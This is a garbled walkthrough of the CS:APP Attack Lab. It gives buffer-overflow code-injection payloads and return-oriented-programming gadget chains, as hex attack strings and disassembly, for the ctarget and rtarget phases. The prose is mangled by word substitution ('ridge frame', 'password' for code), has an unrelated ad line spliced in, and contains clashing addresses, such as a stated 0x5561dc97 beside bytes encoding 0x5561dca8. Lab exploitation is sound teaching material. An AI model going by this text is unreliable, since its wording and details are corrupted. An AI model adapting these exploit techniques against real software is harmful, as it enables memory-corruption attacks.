Keywords: encoding ascii
Read the lab manual and start law Attacklab
CTARGET step 1
The an initial Attack Phase needs calling the existing role touch1. This is simple. You must overwrite the an initial address the touch1 through the return attend to in the stack.
You are watching: Attack lab phase 2
First, usage gdb to debug ctarget and also disassemble the assembly password of getbuf:
Phase 2 requires a little piece of password to it is in injected and also the touch2(unsigned) role is dubbed with parameters.First the all, if you check out touch2 in the experiment manual, you must judge her cookie:
First, perform the present information:Stack Address:0x5561dc78function touch2 address:0x00000000004017ecCookie:0x59b997faThen start writing the injected code. The objective of this code is to call touch2 with parameters
fun2:movl $0x59b997fa,%edipushq $0x4017ecretAssemble the target file, and also then use objdump -d to disassemble it to phase2.txt:
phase2.o: paper format elf64-x86-64Disassembly of section .text:0000000000000000 fun2>: 0:bf fa 97 b9 59 mov $0x59b997fa,%edi 5:68 ec 17 40 00 pushq $0x4017ec a:c3 retq store the binary part, finish 40 bytes, and also then append the deal with returned come the stack frame,Get the record phase2.txt:
bf fa 97 b9 59 /* movl $0x59b997fa,%edi */68 ec 17 40 00 /* movq $0x4017ec,(%rsp) */c3 /* retq */ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef78 dc 61 55 00 00 00 00Enter command question:
PS: that is also possible to compose the injection regime as follows:
fun2:movl $0x59b997fa,%edisubq $8,%rspmovq $0x4017ec,(%rsp)ret
CTARGET step 3Read the handout file first. That is emphasized in the paper that the stack frame allocated by getbuf may be covered by the hexbatch role and the strncmp function. So we choose the parent stack frame of getbuf, the is, the stack framework of test role to save our string. Anyway, we will certainly not go back to the check function, and the routine will end execution in the touch3 duty body.
First of all, we identified the ridge frame attend to as 0x5561dc78 from the above question. Disassembly that touch3 duty found that the starting address that touch3 function was 0x4018fa, since we determined to save the string in the parent stack frame, the distance in between the string and the beginning address of ours stack frame is 40 bytes (from the above question, we recognize that getbuf has allocated 40 bytes of ridge frame). Therefore the beginning address the the string is 0x5561dc78+40Bytes=0x5561dc97.
So let\"s compose the injection Code:
movq $0x5561dc97,%rdipushq $0x4018faretqAfter assembly, to fill in the placeholder the 27Bytes in between the code and return address, and fill in the ASCII string of string at the end:
48 c7 c7 a8 dc 61 55 /* movq $0x5561dc97,%rdi */68 fa 18 40 00 /* pushq $0x4018fa */c3 /* retq */ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef /* useless bytes.total 27 bytes */78 dc 61 55 00 00 00 00 /* begin of password area */35 39 62 39 39 37 66 61 00 /* little endian depiction of string \"59b997fa\" , this string will certainly fill in duty test`s stack framework */Run program test, pass.
RTARGET step 2
RTARGET phase 2 requires to uncover the code composition gadget required through the strike from the existing password to repeat the ahead CTARGET step 2 experiment.First, in GDB. / rtarget, type the command disas / R start farm. Mid farm to view all the instructions and also their codes between start farm and mid Farm:
To watch the decompilation results, you require to uncover a popq instruction and a movq instruction. Therefore, you should divide them right into two gadgets. These 2 instructions must be followed straight by the 0xc3(retq) return instruction or the 0x90(nop) indict in the middle.
Let\"s uncover Gadget1 first. The encoding the the popq instruction is 0x58-0x5f. Watch the figure over and discover that the encoding with the beginning address the 0x4019cc meets the requirements:
58 90 c3 three hexadecimal codes space respectively POPQ% rax, nop, retq three instructions.
Come come Gadget2.The coding of movq instruction starts through 0x48 0x89, so that is quickly locked to the starting address 0x4017ec. Over there are 4 hexadecimal numbers under this address: 48 89 c7 c3, coded separatelyMovq% rax,% RDI, retq instructions, just satisfy the requirements.
Roughly draw the ridge distribution:
|%rsp+32||touch2 duty start address||0x4017ec|
|%rsp+24||Gadget2 begin address||0x4019a2|
|%rsp+8||Gadget1 begin address||0x4019cc|
Therefore, the attack text is built as follows:
ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef efef ef ef ef ef ef ef ef ef ef ef ef ef ef ef efef ef ef ef ef ef ef efcc 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00a2 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00Running procedure, happen successfully:
RTARGET step 3
This subject is comparable to RTARGET Phase2. It also requires the combination of existing codes to realize the function of CTARGET phase 3.First, disassemble every the accuse from start farm to finish farm, and then note all possible instructions according to the figure in the speculative Manual (as shown below):
:b8 01 00 00 00mov $0x1,%eax0x0000000000401999 :c3retq0x000000000040199a :b8 fb 78 90 90mov $0x909078fb,%eax0x000000000040199f :c3retq0x00000000004019a0 :8d 87 48 89 c7 c3lea -0x3c3876b8(%rdi),%eax0x00000000004019a6 :c3retq0x00000000004019a7 :8d 87 51 73 58 90lea -0x6fa78caf(%rdi),%eax //58 90 c3 because that POPQ% rax; NOP; ret0x00000000004019ad :c3retq0x00000000004019ae :c7 07 48 89 c7 c7movl $0xc7c78948,(%rdi)0x00000000004019b4 :c3retq0x00000000004019b5 :c7 07 54 c2 58 92movl $0x9258c254,(%rdi)0x00000000004019bb :c3retq0x00000000004019bc :c7 07 63 48 8d c7movl $0xc78d4863,(%rdi)0x00000000004019c2 :c3retq0x00000000004019c3 :c7 07 48 89 c7 90movl $0x90c78948,(%rdi) //48 89 c7 for movq rdx,%rdi;89 c7 because that movl edx,%edi;90 because that nop0x00000000004019c9 :c3retq0x00000000004019ca :b8 29 58 90 c3mov $0xc3905829,%eax0x00000000004019cf :c3retq0x00000000004019d0 :b8 01 00 00 00mov $0x1,%eax0x00000000004019d5 :c3retq0x00000000004019d6 :48 8d 04 37lea (%rdi,%rsi,1),%rax0x00000000004019da :c3retq0x00000000004019db :b8 5c 89 c2 90mov $0x90c2895c,%eax //89 c2 90 because that movl% eax,% EDX0x00000000004019e0 :c3retq0x00000000004019e1 :c7 07 99 d1 90 90movl $0x9090d199,(%rdi)0x00000000004019e7 :c3retq0x00000000004019e8 :8d 87 89 ce 78 c9lea -0x36873177(%rdi),%eax0x00000000004019ee :c3retq0x00000000004019ef :8d 87 8d d1 20 dblea -0x24df2e73(%rdi),%eax0x00000000004019f5 :c3retq0x00000000004019f6 :b8 89 d1 48 c0mov $0xc048d189,%eax0x00000000004019fb :c3retq0x00000000004019fc :c7 07 81 d1 84 c0movl $0xc084d181,(%rdi)0x0000000000401a02 :c3retq0x0000000000401a03 :8d 87 41 48 89 e0lea -0x1f76b7bf(%rdi),%eax //48 89 e0 for movq% RSP,% rax0x0000000000401a09 :c3retq0x0000000000401a0a :c7 07 88 c2 08 c9movl $0xc908c288,(%rdi)0x0000000000401a10 :c3retq0x0000000000401a11 :8d 87 89 ce 90 90lea -0x6f6f3177(%rdi),%eax //89 ce 90 90 way movl% ECX,% ESI; NOP; NOP0x0000000000401a17 :c3retq0x0000000000401a18 :b8 48 89 e0 c1mov $0xc1e08948,%eax0x0000000000401a1d :c3retq0x0000000000401a1e :8d 87 89 c2 00 c9lea -0x36ff3d77(%rdi),%eax0x0000000000401a24 :c3retq0x0000000000401a25 :8d 87 89 ce 38 c0lea -0x3fc73177(%rdi),%eax //89 ce 38 c0 method movl% ECX,% ESI; cmpb% Al,% Al; keep in mind that cmpb has no effect on the regime at this time, i beg your pardon is equivalent to nop null operation.0x0000000000401a2b :c3retq0x0000000000401a2c :c7 07 81 ce 08 dbmovl $0xdb08ce81,(%rdi)0x0000000000401a32 :c3retq0x0000000000401a33 :b8 89 d1 38 c9mov $0xc938d189,%eax //89 d1 38 c9 means movl% EDX,% ECX; cmpb% Cl,% Cl (at this time, cmpb is identical to nop)0x0000000000401a38 :c3retq0x0000000000401a39 :8d 87 c8 89 e0 c3lea -0x3c1f7638(%rdi),%eax0x0000000000401a3f :c3retq0x0000000000401a40 :8d 87 89 c2 84 c0lea -0x3f7b3d77(%rdi),%eax //89 c2 84 c0 means movl% eax,% EDX; testb% Al,% Al; note that testb has actually no influence on the regimen at this time, i beg your pardon is identical to nop null operation.
See more: Microsoft Xbox One S 1Tb Halo, Xbox One S 1Tb Console Halo Wars 2 Bundle
0x0000000000401a46 :c3retq0x0000000000401a47 :8d 87 48 89 e0 c7lea -0x381f76b8(%rdi),%eax0x0000000000401a4d :c3retq0x0000000000401a4e :b8 99 d1 08 d2mov $0xd208d199,%eax0x0000000000401a53 :c3retq0x0000000000401a54 :b8 89 c2 c4 c9mov $0xc9c4c289,%eax0x0000000000401a59 :c3retq0x0000000000401a5a :c7 07 48 89 e0 91movl $0x91e08948,(%rdi)0x0000000000401a60 :c3retq0x0000000000401a61 :8d 87 89 ce 92 c3lea -0x3c6d3177(%rdi),%eax0x0000000000401a67 :c3retq0x0000000000401a68 :b8 89 d1 08 dbmov $0xdb08d189,%eax0x0000000000401a6d :c3retq0x0000000000401a6e :c7 07 89 d1 91 c3movl $0xc391d189,(%rdi)0x0000000000401a74 :c3retq0x0000000000401a75 :c7 07 81 c2 38 d2movl $0xd238c281,(%rdi)0x0000000000401a7b :c3retq0x0000000000401a7c :c7 07 09 ce 08 c9movl $0xc908ce09,(%rdi)0x0000000000401a82 :c3retq0x0000000000401a83 :8d 87 08 89 e0 90lea -0x6f1f76f8(%rdi),%eax0x0000000000401a89 :c3retq0x0000000000401a8a :8d 87 89 c2 c7 3clea 0x3cc7c289(%rdi),%eax0x0000000000401a90 :c3retq0x0000000000401a91 :b8 88 ce 20 c0mov $0xc020ce88,%eax0x0000000000401a96 :c3retq0x0000000000401a97 :c7 07 48 89 e0 c2movl $0xc2e08948,(%rdi)0x0000000000401a9d :c3retq0x0000000000401a9e :8d 87 89 c2 60 d2lea -0x2d9f3d77(%rdi),%eax0x0000000000401aa4 :c3retq0x0000000000401aa5 :b8 8d ce 20 d2mov $0xd220ce8d,%eax0x0000000000401aaa :c3retq0x0000000000401aab :c7 07 48 89 e0 90movl $0x90e08948,(%rdi)0x0000000000401ab1 :c3retq
Then we can around determine the assault scheme: placed the string in the stack. In stimulate to find the place of the string, we should take out the position at the optimal of the stack, and add the counter of the string position in the stack to type the cable address. The plan is around as complies with (A > B method to assign A come B)%rsp – >POPQ% rax;% eax – >%rdi+%rsi – >
The ridge is dispersed as follows: (address room grows up)
|Actual string||String content|
|Function address||touch3 role start address|
|Offset value||String offset|
Finally, you must calculate the string offset value. Keep in mind that once executing the very first Gadget% rsp -- > rax, rsp in reality points to the start deal with of the 2nd Gadget, therefore the offset value the the string should be 9x8Byte=72Byte, that is, the hexadecimal worth 0x48.
The assault string is constructed as follows: (the first 40 EFS are used to to fill buf, complied with by the reverse order the the corresponding components in the stack (Gadget is the equivalent address))